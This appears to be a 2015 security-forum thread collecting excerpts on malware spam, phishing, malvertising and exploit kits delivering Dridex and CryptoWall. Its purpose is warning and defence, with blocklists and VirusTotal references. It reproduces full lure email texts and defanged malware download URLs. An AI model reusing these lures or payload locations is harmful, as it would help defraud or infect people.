> https://2.bp.blogspot.com/-R9BG4uiZ_eQ/VXlQ92ukk-I/AAAAAAAAGrY/sSh3U4RhHjg/s320/hf-3.png
I suspect that all this portion is doing is collecting email addresses and passwords for use later. Webmail accounts have some value to the bad guys, and of course many people re-use passwords all over the place, so it could be used as a way to get access to other services. Take care.
Recommended blocklist:
31.220.16.16
92.222.42.183 "
* http://urlquery.net/report.php?id=1434011774093
** https://www.virustotal.com/en/ip-address/92.222.42.183/information/
*** https://www.virustotal.com/en/ip-address/31.220.16.16/information/
___
Mystery continues to surround the nude celebrity iCloud hack
- http://www.hotforsecurity.com/blog/mystery-continues-to-surround-the-nude-celebrity-icloud-hack-11990.html
June 11, 2015 - "Sure, companies and governments get hacked all the time. But for the mainstream media to *really* take an interest, you need to add a twist of celebrity (preferable nude and female). That’s what happened last year when the so-called 'Fappening' saw the intimate and private photographs of scores of female celebrities and actresses, many of them topless or nude, leak onto 4Chan and the seedier corners of Reddit. Famous names who had their privacy violated by the leak included Jennifer Lawrence, Kate Upton, Victoria Justice, Kirsten Dunst, Hope Solo, Krysten Ritter, Yvonne Strahovski, Teresa Palmer, Ariana Grande, and Mary Elizabeth Winstead, amongst many others... According to Gawker has revealed a search warrant and affidavit, revealing that the FBI has seized computers belonging to a Chicago man in connection with the hack. And it appears that the documents back Apple’s claim that their iCloud service did -not- suffer a breach as such, but instead was the victim of a targeted attack after celebrities’ passwords and security questions were determined. In the affidavit, FBI cybercrime special agent Josh Sadowsky says that an IP address assigned to one Emilio Herrera was “used to access approximately 572 unique iCloud accounts” between May 13 2013 and August 31 2014. According to the statement, a number of the accounts accessed belonged to celebrities who had photos leaked online. In all, iCloud accounts were accessed -3,263- times from the IP address. In addition, the IP address was used from a computer running Windows 7 to reset -1,987- unique iCloud account passwords. Unsurprisingly, law enforcement officers visited Herrera’s house in Chicago and walked away with computers, phones, SD cards, and other devices that no doubt they planned to submit to forensic scrutiny. In particular they would be interested in uncovering any evidence of activity which might suggest phishing, the usage of hacking tools or email forwarding. But here’s where things get interesting. According to Gawker, Herrera has -not- been charged with any crime and is not even considered a suspect at this point. It would certainly be surprising if someone involved in such an industrial-scale account hijacking operation would not have taken elementary steps to hide their true IP address, so is it possible that Herersa’s computers were being used by the hackers of nude celeb’s iCloud accounts -without- Hererra’s knowledge or permission? If that is the case, then it’s yet another reason why all computer users need to learn the importance of proper computer security. Keeping your computer protected with a layered defence and patched against the latest vulnerabilities reduces the chance of a remote-hacker gaining control of your PC. Because the very last thing you want is to be implicated in a crime that you didn’t commit, because hackers have been able to commandeer your computer for their own evil ends."
- Graham Cluley
:fear::fear::mad:
AplusWebMaster
2015-06-12, 14:34
FYI...
Fake 'Confirmation transfer' SPAM - PDF malware
- http://myonlinesecurity.co.uk/hsbc-confirmation-of-the-transfer-fake-pdf-malware/
12 June 2015 - "'Confirmation of the transfer' pretending to come from HSBC (random name@random email address) with a zip attachment is another one from the current bot runs... The email looks like:
Transfer:
Number of Transfer: 359880-67692630-94464
To: [redacted]
Bank sender: HSBS
Country Poster: England
City Poster: London
12 June 2015: transfer-England-359880-67692630-94464.zip(random numbers):
Extracts to: New_docs.exe - Current Virus total detections: 4/57*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/344e0085ce3bce73846c8705a907da4fc04d4f7c0fc70f10a161e1d176c919a0/analysis/1434111878/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en-gb/ip-address/64.182.208.183/information/
188.120.194.101: https://www.virustotal.com/en-gb/ip-address/188.120.194.101/information/
24.19.25.40: https://www.virustotal.com/en-gb/ip-address/24.19.25.40/information/
88.221.14.249: https://www.virustotal.com/en-gb/ip-address/88.221.14.249/information/
___
Malvertising 'Pop-under ads' lead to CryptoWall
- https://blog.malwarebytes.org/malvertising-2/2015/06/popcash-malvertising-leads-to-cryptowall-3-0/
June 11, 2015 - "... malvertising leverages the infrastructure provided by ad networks to distribute malicious content to end users while they browse the Internet... a prolific ad network (over 180M hits/month according to SimilarWeb) being used by online fraudsters to distribute malware and other nuisances. 'Popcash' is a pop-under ad network that offers services for both publishers and advertisers: https://blog.malwarebytes.org/wp-content/uploads/2015/06/popcashlogo.png
'Pop-under ads are similar to pop-up ads, but the ad window appears -hidden- behind the main browser window rather than superimposed in front of it... They usually remain -unnoticed- until the main browser window is closed or minimized, leaving the user’s attention free for the advertisement... users therefore react 'better' to pop-under advertising than to pop-up advertising because of this different, delayed 'impression'. — Wikipedia**
** https://en.wikipedia.org/wiki/Pop-up_ad#Pop-under_ads
... In this case, we received a URL used as a gate to an exploit kit:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/redirection.png
The Magnitude EK starts with a simplified landing page that contains the code to launch a Flash exploit and an iframe to perform an Internet Explorer exploit... The Flash exploit (VT)[3] is CVE-2015-3090 as reported on malware.dontneedcoffee[4]:
3] https://www.virustotal.com/en/file/0d818f1ba3154902413b6ed1da318734668d1dac331d45077e63ff8b6d789e7f/analysis/1434044838/
4] http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html
... The Internet Explorer exploit (CVE-2014-6332 or CVE-2013-2551 thanks @kafeine) is prepared via a heavily encoded piece of JavaScript... Several URLs are loaded but only a couple actually loaded the same binary (VT)[5] detected by Malwarebytes Anti-Malware as Trojan.Dropper.Necurs, which eventually loads CryptoWall 3.0... other slots are available and could be filled with different malware families by the exploit kit operator...
5] https://www.virustotal.com/en/file/54bbabf037f1fa695a86246e1bf947a232fa1fcd261638affcdfdbd0d931bf48/analysis/1434001814/
... CryptoWall 3.0: Magnitude EK, just like many other exploit kits recently, is pushing crypto ransomware, possibly one of the worst strains of malware because it uses genuine encryption to lock down a user’s personal files. Soon after the ransomware takes over the PC, it will prompt a message warning of what just happened and giving details on how to proceed:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/HELP_DECRYPT.png
In this case, one needs to pay $500 to get their files back within the deadline, otherwise that amounts doubles:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/BT.png
Conclusions: Because malvertising involves multiple players in order to work (publishers, ad networks, visitors) each has its own role to play in combatting this problem. Publishers (should) be wise in choosing their third-party advertisers by choosing reputable ones (although it is not a 100% guarantee (nothing is) that incidents will not happen). Ad networks can and should also ensure that the traffic they serve is clean. We contacted Popca$h on two separate occasions through their official “report malware” page, but -never- received a response... The campaign is still -ongoing- and not only serving exploits but -also- tech support scams[6] customized for your browser, ISP, city, etc:
6] https://blog.malwarebytes.org/wp-content/uploads/2015/06/warning.png "
(More detail at the malwarebytes URL at the top of this post.)
- http://windowssecrets.com/patch-watch/no-summer-break-from-ms-office-updates/
June 11, 2015 - "... Flash Player 18.0.0.160 addresses 13 vulnerabilities, some of which have already been used in ransomware attacks..."
:fear::fear::fear: :mad:
AplusWebMaster
2015-06-15, 14:33
FYI...
Fake 'Payment Confirmation' SPAM - doc/xls malware
- http://blog.dynamoo.com/2015/06/malware-spam-payment-confirmation.html
15 Jun 2015 - "This fake financial spam does not come from Reed, but is instead a simple forgery with a malicious attachment:
From: reed .co.uk Credit Control [mailto:creditcontrol.rol@ reed .co.uk]
Sent: Monday, June 15, 2015 11:10 AM
Subject: Payment Confirmation 29172230
Dear Sirs,
Many thanks for your card payment. Please find payment confirmation attached below.
Should you have any queries, please do not hesitate to contact Credit Control Team on 0845 241 9293.
Kind Regards
Credit Control Team
T: 020 7067 4584
F: 020 7067 4628
Email: creditcontrol.rol@ reed .co.uk
The only sample I have seen so far has an attachment 29172230_15.06.15.doc [detection rate 3/57*] which contains this malicious macro... which downloads a component from the following location:
http ://www .freewebstuff .be/34/44.exe
This is saved as %TEMP%\ginkan86.exe and has a VirusTotal detection rate of 6/57**. There will probably be other download locations, but they should all lead to an identical binary. Automated analysis tools... show traffic to the following IPs:
136.243.14.142 (Hetzner, Germany)
71.14.1.139 (Charter Communications, US)
173.230.130.172 (Linode, US)
94.23.53.23 (OVH, France)
176.99.6.10 (Global Telecommunications Ltd, Russia)
According the this Malwr report[3], it also drops a Dridex DLL with a detection rate of 18/57[4].
Recommended blocklist:
136.243.14.142
71.14.1.139
173.230.130.172
94.23.53.23
176.99.6.10 "
* https://www.virustotal.com/en/file/b8ca4236c9461e40b9eb806b91bfda8c41691e71d43dc4b4ba68b0009de9df62/analysis/1434362701/
** https://www.virustotal.com/en/file/0532fdda6923b20813aa7fcd2016395fc3284a6ece7909a36d8c345d896fbfed/analysis/1434362861/
3] https://malwr.com/analysis/NDI1OGY0NTVjYTkxNGVjOWFiZjQ3MTA0YzFlMzk2MDA/
4] https://www.virustotal.com/en/file/0532fdda6923b20813aa7fcd2016395fc3284a6ece7909a36d8c345d896fbfed/analysis/1434362861/
freewebstuff .be: 46.21.172.135: https://www.virustotal.com/en-gb/ip-address/46.21.172.135/information/
- http://myonlinesecurity.co.uk/payment-confirmation-reed-co-uk-credit-control-word-doc-or-excel-xls-spreadsheet-malware/
15 Jun 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/reed-payment-confirmation.png
> https://www.virustotal.com/en-gb/file/b8ca4236c9461e40b9eb806b91bfda8c41691e71d43dc4b4ba68b0009de9df62/analysis/1434364970/
___
Fake 'Nyfast Payment' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/nyfast-payment-accepted-word-doc-or-excel-xls-spreadsheet-malware/
15 Jun 2015 - "'[Nyfast] Payment accepted' pretending to come from Nyfast <sales@ nyfast .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/nyfast.png
15 June 2015: 101153.doc - Current Virus total detections: 3/57*
... Which connects to and downloads Dridex banking malware from http ://webbouw .be/34/44.exe ( VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/4b8a883a69576f6b80e1b304c462ee027b57dfa379f53ab7611d11f743e699cf/analysis/1434364039/
** https://www.virustotal.com/en-gb/file/0532fdda6923b20813aa7fcd2016395fc3284a6ece7909a36d8c345d896fbfed/analysis/1434362861/
webbouw .be: 46.21.172.135: https://www.virustotal.com/en/ip-address/46.21.172.135/information/
___
Fake 'PI-ORDER' SPAM – PDF malware
- http://myonlinesecurity.co.uk/pi-order-suiming-group-fake-pdf-malware/
15 Jun 2015 - "'PI-ORDER' with a zip attachment pretending to come from suiming <suiminggroup@ cs .ename .net> is another one from the current bot runs... The email looks like:
Dear Sir/madam,
Find attached our purchase order. Kindly quote us best price and send us proforma invoice asap, so that we can proceed with the necessary payment.kindly confirm the PO and send PI asap.
kind Regards
suiming Group
15 June 2015: PI-ORDER.zip: Extracts to: PI-ORDER.exe - Current Virus total detections: 9/57*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/5002420dec1e426f5daeb4b68ebac2139ccdd2e92b3554ac5400ca6b2dbcd797/analysis/1434339886/
___
Fake 'New Doc' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/will-kinghan-henryhowardfinance-co-uk-new-doc-word-doc-or-excel-xls-spreadsheet-malware/
15 Jun 2015 - "'Will Kinghan henryhowardfinance .co .uk New Doc' pretending to come from Will Kinghan <WKinghan@hhf .uk .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/new-doc-will-kinghan.png
15 June 2015 : New doc.doc ... which is the -same- malware as described in today’s other word doc malspam runs Payment Confirmation reed .co .uk Credit Control* – word doc or excel xls spreadsheet malware and [Nyfast] Payment accepted** – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* http://myonlinesecurity.co.uk/payment-confirmation-reed-co-uk-credit-control-word-doc-or-excel-xls-spreadsheet-malware/
** http://myonlinesecurity.co.uk/nyfast-payment-accepted-word-doc-or-excel-xls-spreadsheet-malware/
___
'Let us help you make your online banking with HSBC more secure' - PHISH
- http://myonlinesecurity.co.uk/let-us-help-you-make-your-online-banking-with-hsbc-more-secure-phishing/
15 Jun 2015 - "An email saying 'Let us help you make your online banking with HSBC more secure' is one of today’s -phishing- attempts. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
- Confirmation of Order
... It will NEVER be a genuine email from PayPal or Your Bank so don’t ever fill in the html (webpage) form that comes attached to the email. Some versions of this phish will have a link to a website that looks at first glance like the genuine bank website. That is also false... The link in the email directs you to a -fake- site, if you look at the fake website, you would be very hard-pressed to tell the difference from the fake one and the genuine site. The -only- way is look at the address bar and in the Genuine PayPal site, when using Internet Explorer the entire address bar is in green (in Chrome or Firefox, only the padlock symbol on the left of the browser is green):
>> http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/HSBC_phish_site.png
... luckily the phishing site has been deactivated by the webhosts, but be careful and remember that banks don’t send emails saying 'follow-the-link' to change anything..."
___
Fake 'Notice DHL' SPAM - PDF malware
- http://myonlinesecurity.co.uk/hsbc-notice-dhl-fake-pdf-malware/
15 Jun 2015 - "'Notice DHL' pretending to come from HSBC (random name @ random email address) with a zip attachment is another one from the current bot runs... The waybill number is random in each email but -matches- the attachment name. The email looks like:
Notice DHL
Courier our company was unable to deliver the goods.
CAUSE: was lost your number
Delivery Status: Active
Services: delivery in one day
Waybill number for your cargo: WL4OY-k5qvML-0136
Special sticker attached to the letter. Print sticker and show it in your post office.
15 June 2015: Sticker-WL4OY-k5qvML-0136.zip: Extracts to: New_docs.exe
Current Virus total detections: 1/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/5f8d5f4812bfcf0180616eedb27d8eab9bc9eb37d89addb9911f0a9632147279/analysis/1434373340/
:fear::fear::mad:
AplusWebMaster
2015-06-16, 15:21
FYI...
Magnitude Exploit Kit uses Newly Patched Adobe Vuln ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/
Jun 16, 2015 - "Adobe may have already patched a Flash Player vulnerability last week, but several users — especially those in the US, Canada, and the UK — are still currently exposed and are at risk of getting infected with CryptoWall 3.0. The Magnitude Exploit Kit included an exploit, detected as SWF_EXPLOIT.MJTE, for the said vulnerability, allowing attackers to spread crypto-ransomware into their target systems. We first saw signs of this activity yesterday, June 15... Adobe’s regular June Update for Adobe Flash Player... upgraded the software to version 18.0.0.160*. However, many users are still running the previous version (17.0.0.188), which means that a lot of users are still at risk... cybercriminals rapidly take advantage of recently-patched vulnerabilities through exploit kits. We saw a similar incident in March, where exploits for an Adobe Flash Player vulnerability were added to the Nuclear Exploit Kit just a week after the patch was released. We also noted earlier this month that Flash Player was being targeted more frequently by exploit kits, and that shows no sign of changing soon..."
* https://www.adobe.com/products/flashplayer/distribution3.html
___
Fake 'Travel order' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/the-caravan-club-travel-order-confirmation-0300202959-word-doc-or-excel-xls-spreadsheet-malware/
16 Jun 2015 - "'Travel order confirmation 0300202959' pretending to come from overseastravel@ caravanclub .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear customer,
Thank you for your travel order.
Please find attached your booking confirmation which you should take with you on your trip. Please note we no longer send tickets for overseas travel bookings.
Your booking confirmation document is stored as a DOC file which requires the use of Microsoft Word software to view it.
Yours sincerely
The Caravan Club
This email is sent from the offices of The Caravan Club, a company limited by guarantee (Company Number: 00646027). The registered office is East Grinstead House, London Road, East Grinstead, West Sussex, RH19 1UA.
Regulation The Caravan Club Ltd is authorised and regulated by the Financial Conduct Authority. FCA registration number is 311890
This email is sent from the offices of The Caravan Club Limited...
16 June 2015: Travel Order Confirmation – 0300202959.doc
Current Virus total detections: 4/57* ... downloads Dridex banking malware from aspectaceindia .in/90/72.exe (VirusTotal**). Note: there are normally 5 or 6 other download locations but all will lead to same Dridex banking malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/a6db40b6751b42e6bb53aaf6b92657b5c1042ef66f3cc5b5dabae488356038e3/analysis/1434440780/
** https://www.virustotal.com/en-gb/file/539750d11af0b92f8365e4aa20248fdd46fc6726e7141bef30688fafcf92b938/analysis/1434441238/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-address/37.143.11.165/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
aspectaceindia .in: 203.124.96.148: https://www.virustotal.com/en-gb/ip-address/203.124.96.148/information/
___
Fake 'Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/carol-young-baguette-express-invoice-word-doc-or-excel-xls-spreadsheet-malware/
16 Jun 2016 - "'Invoice' pretending to come from Carol Young <carol@ baguette-express. co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Invoice Attached
Carol Young
Accounts Manager
Office:0845 070 4360
Email: carol@ baguette-express .co.uk
Web: www .baguette-express .co.uk
1 Cranston Crescent
Lauder
Borders
TD2 6UB
16 June 2015: A4 Inv_Crd Unit Price, With Discount.doc - Current Virus total detections: 4/57*
... downloads Dridex banking malware from dubrovnik-marryme .com/90/72.exe (VirusTotal**) This is the -same- malware payload as described in today’s other malspam word macro malware 'The caravan Club Travel order confirmation 0300202959'*** – word doc or excel xls spreadsheet malware..."
* https://www.virustotal.com/en-gb/file/2fb05492886bfab3a1163a0992d0ca7bbff2d07c927c4add4839966eaa53516a/analysis/1434441322/
** https://www.virustotal.com/en-gb/file/539750d11af0b92f8365e4aa20248fdd46fc6726e7141bef30688fafcf92b938/analysis/1434441238/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-address/37.143.11.165/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
*** http://myonlinesecurity.co.uk/the-caravan-club-travel-order-confirmation-0300202959-word-doc-or-excel-xls-spreadsheet-malware/
dubrovnik-marryme .com: 188.40.57.166: https://www.virustotal.com/en-gb/ip-address/188.40.57.166/information/
___
Fake 'Invoice copy' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/gary-almond-almondscateringsupplies-co-uk-invoice-copy-no-252576-word-doc-or-excel-xls-spreadsheet-malware/
16 Jun 2015 - "'Invoice copy no. 252576' pretending to come from kathy@ almondscateringsupplies .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find attached DOC document with invoice copy no. 252576
Kind regards,
Gary Almond
16 June 2015 : DespatchNote_-_252576_160615_063107663.doc - Current Virus total detections: 4/57*
... downloads Dridex banking malware from aspectaceindia .in/90/72.exe (VirusTotal**)
Note: there are normally 5 or 6 other download locations but all will lead to same Dridex banking malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/a6db40b6751b42e6bb53aaf6b92657b5c1042ef66f3cc5b5dabae488356038e3/analysis/1434440780/
** https://www.virustotal.com/en-gb/file/539750d11af0b92f8365e4aa20248fdd46fc6726e7141bef30688fafcf92b938/analysis/1434441238/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-address/37.143.11.165/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
aspectaceindia .in: 203.124.96.148: https://www.virustotal.com/en-gb/ip-address/203.124.96.148/information/
___
Fake 'Internet Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/eclipse-internet-invoice-is-available-online-36889843ec-word-doc-or-excel-xls-spreadsheet-malware/
16 Jun 2015 - "'Eclipse Internet Invoice is available online – 36889843EC' pretending to come from customer@ eclipse .net.uk with a malicious word doc called EC_36889843_88113463.doc is another one from the current bot runs... The email looks like:
Dear Customer,
Thank you for choosing to receive your invoice by email. Please find this attached.
If you would like to change any of your billing options, please log in to My Eclipse using your registration email and password... Alternatively, you can contact our Customer Service Team, Monday to Friday 8am – 6pm, on the telephone number published...
Kind regards
Eclipse Internet
The number in the subject which is random -matches- the word attachment name, so everybody gets a different named email and attachment. The malicious macro and the downloaded Dridex banking malware is exactly the -same- as described in today’s earlier other word macro malspam runs:
1]'Gary Almond almondscateringsupplies .co.uk Invoice copy no. 252576 – word doc or excel xls spreadsheet malware':
- http://myonlinesecurity.co.uk/gary-almond-almondscateringsupplies-co-uk-invoice-copy-no-252576-word-doc-or-excel-xls-spreadsheet-malware/
2]'Carol Young baguette-express Invoice – word doc or excel xls spreadsheet malware':
- http://myonlinesecurity.co.uk/carol-young-baguette-express-invoice-word-doc-or-excel-xls-spreadsheet-malware/
3]'The caravan Club Travel order confirmation 0300202959 – word doc or excel xls spreadsheet malware':
- http://myonlinesecurity.co.uk/the-caravan-club-travel-order-confirmation-0300202959-word-doc-or-excel-xls-spreadsheet-malware/
The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
___
Trojan uses steganography to hide itself in image files
- http://net-security.org/malware_news.php?id=3058
16.06.2015 - "The Dell SecureWorks* CTU research team has recently analyzed a piece of malware that uses digital steganography to hide part of its malicious code. Stegoloader, as they dubbed it, is not technically new. Previous versions of the malware have been spotted in 2013 and 2014, bundled with tools used to crack or generate software keys... Stegoloader's main reason of being is to steal information from users, but it has a modular design, and the researchers themselves say that they might not have yet seen and analyzed all of its modules... Stegoloader is not the first malware to use steganography to hide malicious code or information such as the address of the malware's backup C&C, but the researchers note that it could represent an emerging trend in malware... researcher Saumil Shah recently demonstrated at the Hack in the Box conference**, it's possible to insert both malicious code and exploit code that will trigger it into an image, and this type of delivery mechanism is still undetectable by current defensive solutions."
* http://www.secureworks.com/cyber-threat-intelligence/threats/stegoloader-a-stealthy-information-stealer/
** http://www.net-security.org/secworld.php?id=18443
___
Dutch Users: victims of Large Malvertising Campaign
- https://blog.malwarebytes.org/malvertising-2/2015/06/dutch-users-victim-of-large-malvertising-campaign/
June 15, 2015 - "Security firm Fox-IT* has identified a large malvertising campaign that began affecting Dutch users on June 11:
* http://blog.fox-it.com/2015/06/15/large-malvertising-campaign-targeting-the-netherlands/
In their blog post, they say that several major news sites were loading the -bogus- advertisement that ultimately lead to the Angler exploit kit. Looking at our telemetry we also noticed this attack, and in particular on Dutch news site Telegraaf[.]nl via an advert from otsmarketing .com, which according to Fox-IT is -more- than a suspicious ad network:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/diagram.png
The ad silently loaded a Google shortened URL used to -redirect- to the exploit kit... This latest malvertising case illustrates the efficacy of leveraging ad networks to selectively infect end users while also demonstrating that there is a clear problem with identifying rogue advertisers. As stated by Fox-IT, the company responsible for the malvertising was not 'loaded via advertisements until Thursday last week, the first day we’ve seen this malvertising campaign in action'. This leaves some serious questions about the additional scrutiny in place for new advertisers and how it made it through security checks."
107.181.187.81: https://www.virustotal.com/en-gb/ip-address/107.181.187.81/information/
:fear::fear: :mad:
AplusWebMaster
2015-06-17, 15:55
FYI...
Fake 'PayPal Receipt' SPAM - PDF malware
- http://myonlinesecurity.co.uk/paypal-receipt-for-your-payment-to-omer-salim-fake-pdf-malware/
17 June 2015 - "'Receipt for Your Payment to OMER SALIM' pretending to come from service@ intl .paypal .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/Receipt-for-Your-Payment-to-OMER-SALIM.png
17 June 2015: Receipt99704.zip: Extracts to: Receipt99704.PDF.exe
Current Virus total detections: 10/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/9d40ab9364ed5cdd379faa5a6c178e39c3499d19393707eac8fdfc5cd356aaac/analysis/1434488522/
___
Fake 'Refunds for overpaid taxes' – Phish ...
- http://myonlinesecurity.co.uk/hmrc-refunds-for-overpaid-property-taxes-phishing/
17 June 2015 - "'Refunds for overpaid property taxes' pretending to come from HM Revenue & Customs <ecustomer.support@ hmrc .gateway .gov.uk> is an email pretending to come from HM Revenue & Customs... This one wants your personal details and your bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... This particular email has a zip attachment that when unzipped has html webpage that asks you to fill in bank details. If you open the html attachment you see a webpage looking like this where they want your bank details, name and birth date:
Phish Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/HMRC-Refunds-for-overpaid-property-taxes.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Or whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___
Fake 'Document Service' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/document-service-order-id-14262781-le-bistrot-pierre-limited-icc-word-doc-or-excel-xls-spreadsheet-malware/
17 June 2015 - "'Document Service, Order Id: 14262781 pretending to come from ICC <orders@ icc .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/Document-Service-Order-Id.png
17 June 2015: 14262781_FMM_751061928.doc - Current Virus total detections:4/57*
The malicious macro in this particular word doc downloads Dridex banking malware from http ://cheshiregunroom .com/23/07.exe. There are normally between 5 and 10 other download sites, all giving the same Dridex banking malware (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/1cafc8cc89dd9ac7d12ed4a76a069e5b7c168611030fa3cda7e56459da18f462/analysis/1434529913/
** https://www.virustotal.com/en-gb/file/9b2b5f26a3ef218129504e7b8e198e96395fbd4e33422cb0f2d70eb4f04136d0/analysis/1434531876/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-address/37.143.11.165/information/
88.221.14.249: https://www.virustotal.com/en-gb/ip-address/88.221.14.249/information/
cheshiregunroom .com: 92.63.140.197: https://www.virustotal.com/en-gb/ip-address/92.63.140.197/information/
___
Fake 'Message from KMBT' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/message-from-kmbt_c280-word-doc-or-excel-xls-spreadsheet-malware/
17 Jun 2015 - "Message from KMBT_C280' pretending to come from scanner@ your own email domain with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email comes in with a completely -empty- body and just the subject line of Message from KMBT_C280.
17 June 2015 : SKMBT_C28015061614410.doc - Current Virus total detections: 4/57*
This particular malicious macro downloads Dridex banking malware from http ://businesssupportsoutheastlondon .co.uk/23/07.exe which is the -same- as described in today’s other malspam word doc campaign Document Service, Order Id: 14262781** - LE BISTROT PIERRE LIMITED – ICC – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/b3e490b271715dab743f4b9f1ea38380508d6db223820ef78149a26176fc5852/analysis/1434531806/
** http://myonlinesecurity.co.uk/document-service-order-id-14262781-le-bistrot-pierre-limited-icc-word-doc-or-excel-xls-spreadsheet-malware/
businesssupportsoutheastlondon .co.uk: 88.208.248.144: https://www.virustotal.com/en-gb/ip-address/88.208.248.144/information/
___
Botnet-based malicious SPAM seen this week
- https://isc.sans.edu/diary.html?storyid=19807
2015-06-17 - "Botnets continually send out malicious spam (malspam). As mentioned in previous diaries, we see botnet-based malspam delivering Dridex and Dyre malware almost every day [1, 2]. Recently, someone sent us a malicious Word document from what appeared to be Dridex malspam on Tuesday 2015-06-16... Unfortunately, while investigating the malware, I could not generate the full range of infection traffic. Otherwise, the traffic follows the same general patterns we've previously seen with Dridex [1]... Dridex has been using Microsoft Word documents and Excel spreadsheets designed to infect a computer if macros are enabled, which matches the infection vector used by this malspam... Macros are -not- enabled in the default installation for Microsoft Office. To infect a computer, most people will have to -enable- macros after the document is opened, as shown below:
> https://isc.sans.edu/diaryimages/images/2015-06-16-ISC-diary-image-04.jpg
...
> https://isc.sans.edu/diaryimages/images/2015-06-16-ISC-diary-image-05.jpg ..."
1] https://isc.sans.edu/diary/Recent+Dridex+activity/19687
2] https://isc.sans.edu/diary/UpatreDyre+the+daily+grind+of+botnetbased+malspam/19657
:fear::fear: :mad:
AplusWebMaster
2015-06-18, 15:31
FYI...
Fake email “Bank query alert” contains trojan
- http://blog.mxlab.eu/2015/06/18/fake-email-bank-query-alert-contains-trojan/
June 18, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “Bank query alert”. This email is sent from spoofed email addresses and has the following body:
Good day!
Please note that we have received the bank query from Your bank regarding the current account.
You are asked to fill the appropriate bank form, which is enclosed below, until 20th day of
June in order to avoid the security hold of the account. Please also confirm the following
account No.: 9042 5736 6695 0412. After filling the document please send us the scan-copy
so that we could duly forward it to the bank manager. If you have any questions feel
free to contact us on: 677-77-90.
Thanks in advance.
Best regards, Michael Forester Managing Partner
